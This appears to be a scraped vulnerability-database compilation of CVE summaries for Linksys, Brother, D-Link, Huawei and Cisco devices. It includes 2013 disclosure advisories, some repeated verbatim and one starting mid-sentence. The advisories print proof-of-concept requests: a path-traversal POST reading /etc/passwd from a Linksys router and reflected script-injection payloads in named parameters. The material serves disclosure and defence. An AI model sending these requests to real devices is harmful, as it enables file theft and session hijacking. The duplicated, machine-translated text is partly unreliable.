Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

Brother MFC-9970CDW 1.10 firmware L devices contain a security bypass vulnerability which allows physically proximate attackers to gain unauthorized access. (DoS) It may be put into a state. The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. The Brother MFC-9970 CDW login page uses the auto-complete feature in the password field by default, allowing an attacker with physical access to more easily access user accounts. A remote attacker could exploit this vulnerability to obtain password information. Brother MFC-9970CDW Printer is prone to a security-bypass weakness. An attacker with physical access can exploit this issue to gain unauthorized access to other user's account. Brother MFC-9970CDW 1.10 firmware L is vulnerable; other versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/log_to_net.html id parameter fax/copy_settings.html kind parameter CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Brother MFC-9970CDW 1.10 devices with Firmware L contain a Frameable response (Clickjacking) vulnerability which could allow remote attackers to obtain sensitive information. Brother MFC-9970CDW A vulnerability exists in the device firmware regarding improper restrictions on rendered user interface layers or frames.Information may be obtained. The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. No detailed vulnerability details are currently available. The Brother MFC-9970CDW printer is prone to an unspecified clickjacking vulnerability. Other attacks are also possible. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/log_to_net.html id parameter fax/copy_settings.html kind parameter CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Brother MFC-9970CDW 1.10 firmware L devices contain an information disclosure vulnerability which allows remote attackers to view private IP addresses and other sensitive information. The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. Brother MFC-9970CDW Printer is prone to a remote information-disclosure vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/log_to_net.html id parameter fax/copy_settings.html kind parameter CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Cisco Linksys E4200 1.0.05 Build 7 devices store passwords in cleartext allowing remote attackers to obtain sensitive information. Cisco Linksys E4200 A device contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The Cisco Linksys E4200 is a high-end home/business wireless router developed by Cisco. The Cisco Linksys E4200 running 1.0.05 Build 7 firmware is confirmed to be affected by this vulnerability, which may also be present in other versions. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings Server, and WebEx Node for ASR 1000 Series allows remote attackers to read the contents of uninitialized memory locations via a crafted request, aka Bug IDs CSCue36672, CSCue31363, CSCuf17466, and CSCug61252. Vendors report this vulnerability Bug ID CSCue36672 , CSCue31363 , CSCuf17466 ,and CSCug61252 Published as.A third party could read the contents of the uninitialized memory area via a crafted request. Cisco WebEx is a web conferencing solution. A security vulnerability exists in the HTTP implementation of multiple Cisco WebEx products. Information obtained may aid in further attacks. This issue is being tracked by Cisco Bug IDs CSCue36672, CSCue31363, CSCuf17466, and CSCug61252. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM)

Cisco Wireless LAN Controller (WLC) devices do not properly address the resource consumption of terminated TELNET sessions, which allows remote attackers to cause a denial of service (TELNET outage) by making many TELNET connections and improperly ending these connections, aka Bug ID CSCug35507. The Cisco WLC is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. A security vulnerability exists in the Cisco Wireless LAN Controller. Allows an unauthenticated remote attacker to cause a denial of service for a remote login Telnet session. This vulnerability stems from an application that incorrectly releases an unexpectedly terminated remote login session resource, which can result in the exhaustion of an available Telnet session. This issue is being tracked by Cisco Bug ID CSCug35507

The command-line interface in Cisco Unified Communications Manager (CUCM) does not properly validate input, which allows local users to read arbitrary files via unspecified vectors, aka Bug ID CSCue25770. Vendors have confirmed this vulnerability Bug ID CSCue25770 It is released as.An arbitrary file may be read by a local user. Cisco Unified Communications Manager is a call processing component in the Cisco IP Telephony solution. An attacker can exploit a vulnerability to read arbitrary files and obtain sensitive information. This can lead to further attacks. This issue is documented by the Cisco bug ID's CSCue25770, CSCuh00765 and CSCun74412

The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings Server allows remote attackers to read cache files via a crafted request, aka Bug IDs CSCue36664 and CSCue36629. Vendors have confirmed this vulnerability Bug ID CSCue36664 and CSCue36629 It is released as.A third party may be able to read the cache file through a specially crafted request. Cisco WebEx is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to certain files from the cache directory. Information obtained may aid in further attacks. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM)

When you click the \"Save To\" text box or the \"Browse\" button, the directory on the \"Volume_1\" share will pop up. Click the \"+\" sign to expand the directory. You can send a POST request with the following parameters to /goform/GetNewDir: fNEW_DIR /mnt/ Volume_1f_backup 0f_IP_address <ip address of NAS>f_file 0 Because the fNEW_DIR variable is not fully filtered, the attacker is allowed to upload malicious files to any directory through the directory traversal sequence, such as /etc/shadow. When clicking the \"play button\" that you plan to download, the request submitted to /goform/right_now_d can include the following parameters: T1 <at job id>, SCHEDULE<num>, <user>, <source>, <destination>, <num > The SCHEDULE<num> parameter is not properly filtered, allowing remote attackers to exploit the vulnerability to inject arbitrary OS commands and execute with WEB privileges. D-Link DNS-320 ShareCenter is a gigabit network storage of Taiwan D-Link Group. A remote command execution vulnerability and a directory traversal vulnerability exist in the D-Link DNS-323 ShareCenter. An attacker could use these vulnerabilities to execute arbitrary commands and perform arbitrary access to arbitrary files in the context of an affected device by using a directory traversal string. Vulnerabilities exist in D-Link DNS-323 ShareCenter firmware version 1.09. Other versions may also be affected

Huawei AR 150, 200, 1200, 2200, and 3200 routers, when SNMPv3 is enabled, allow remote attackers to cause a denial of service (device crash) via malformed SNMPv3 requests that leverage unspecified overflow issues. The Huawei AR series router has an overflow error when processing SNMPv3 messages, allowing remote attackers to exploit the vulnerability to submit specially crafted SNMPv3 messages and remotely execute related instructions. AR 150/200/1200/2200/3200 versions V200R001, V200R002, and V200R003 are affected by this vulnerability. Huawei AR Series Routers are AR series router products of China's Huawei. A denial of service vulnerability exists in Huawei AR Series Routers. This vulnerability could be used by a remote attacker to cause a denial of service and could also execute arbitrary code. Remote attackers may exploit this issue to cause denial-of-service conditions. Due to the nature of this issue, arbitrary code execution may be possible; this has not been confirmed. This product provides mobile and fixed network access methods, suitable for enterprise networks

Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) Java servlet container in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud51068. Vendors have confirmed this vulnerability Bug ID CSCud51068 It is released as.By any third party through unspecified parameters Web Script or HTML May be inserted. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCud51068. IBM Tivoli Monitoring (ITM) is a set of system monitoring software developed by IBM Corporation in the United States. The software supports detection of system bottlenecks and potential problems, performance monitoring of essential system resources, automatic recovery from critical situations, and more